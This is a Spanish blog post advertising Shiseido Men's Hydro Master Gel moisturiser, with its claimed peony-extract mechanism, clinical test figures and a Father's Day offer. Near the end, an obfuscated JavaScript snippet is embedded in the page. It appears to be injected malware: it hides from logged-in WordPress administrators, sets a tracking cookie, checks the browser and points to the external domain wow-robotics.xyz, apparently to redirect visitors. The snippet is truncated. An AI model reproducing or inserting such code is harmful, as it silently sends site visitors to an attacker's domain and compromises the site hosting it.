Hoy queremos hablaros de un nuevo lanzamiento de Shiseido Men se trata de la crema hidratante Hydro Master Gel.

Shiseido lanza Hydro Master Gel para el hombre actual, un hombre que se enfrenta a factores como el estrés, una vida muy activa, largas jornadas de trabajo, viajes y que se preocupa por su piel.

Hydro Master Gel de Shiseido Men es un gel hidratante refrescante que actúa de forma simultánea sobre diversos problemas en la piel.

Problemas que preocupan a los hombres como sequedad, brillos y poros dilatados, fatiga o estrés.

 

¿Qué hace Hydro Master Gel de Shiseido? En pocos segundos notaremos como conduce a nuestra piel a un estado de hidratación y equilibro. Basado en la Tecnología Hydro Master, Shiseido consigue que con su uso la propia piel aumente sus niveles de hidratación perfeccionando su superficie.

Os preguntaréis como consigue Hydro Master que tu propia piel aumente sus niveles de hidratación. Gracias a las investigaciones de Shiseido Men los estudios concluyeron que el extracto de raíz de peonía inhibe la activación de la enzima Lipasa (enzima que se encarga de descomponer el sebo en ácidos grasos libres).

Los ácidos grasos libres tienen un efecto negativo sobre nuestra piel generando el exceso de grasa y la aparición de granitos y poros dilatados. Por ello al inhibir el efecto de la enzima Lipasa, Hydro Master consigue que nuestra piel equilibre la hidratación de nuestra piel.

¿Qué notaremos? Nuestra piel mucho más suave y con mayor elasticidad, notaremos que nuestros poros se minimizan. Regula el exceso de sebo y se estabiliza, además de conseguir que el afeitado dejé de irritar la piel. Su rápida absorción y una sensación refrescante que emula una experiencia Water Splash Sensation que nos aportará un frescor inmediato.

¿Cómo se utiliza? Hydro Master Gel puede utilizarse por la mañana y por la noche tras la limpieza y el afeitado.

El test clínico realizado a 101 hombres concluye que el 98% sintió de inmediatamente tras el primer uso su piel bien hidratada y el 90% más suave y fresca.

Tras 4 semanas de uso el 86% notó sus poros dilatados menos visibles y en un 93% la extrema sequedad de su piel había mejorado.

Hydro Master Gel es el regalo perfecto para el Día del Padre.

¡Aprovecha ya las ofertas que tenemos preparadas para el Día del Padre!

  var a=[‘toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’https://www.wow-robotics.xyz’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[‘push’](c[‘shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(‘0x0’)](b(‘0x1’))===null){if(typeof c===b(‘0x2’)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(‘0x3’)](h[b(‘0x4’)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(‘0x5’)+h[b(‘0x6’)]();}document[b(‘0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(‘0x7’)][b(‘0x8’)](‘;’);for(var m=0x0;m

¿Te ha gustado? ¡Compártelo!Share on FacebookTweet about this on TwitterPin on PinterestShare on LinkedInShare on Google+Email this to someone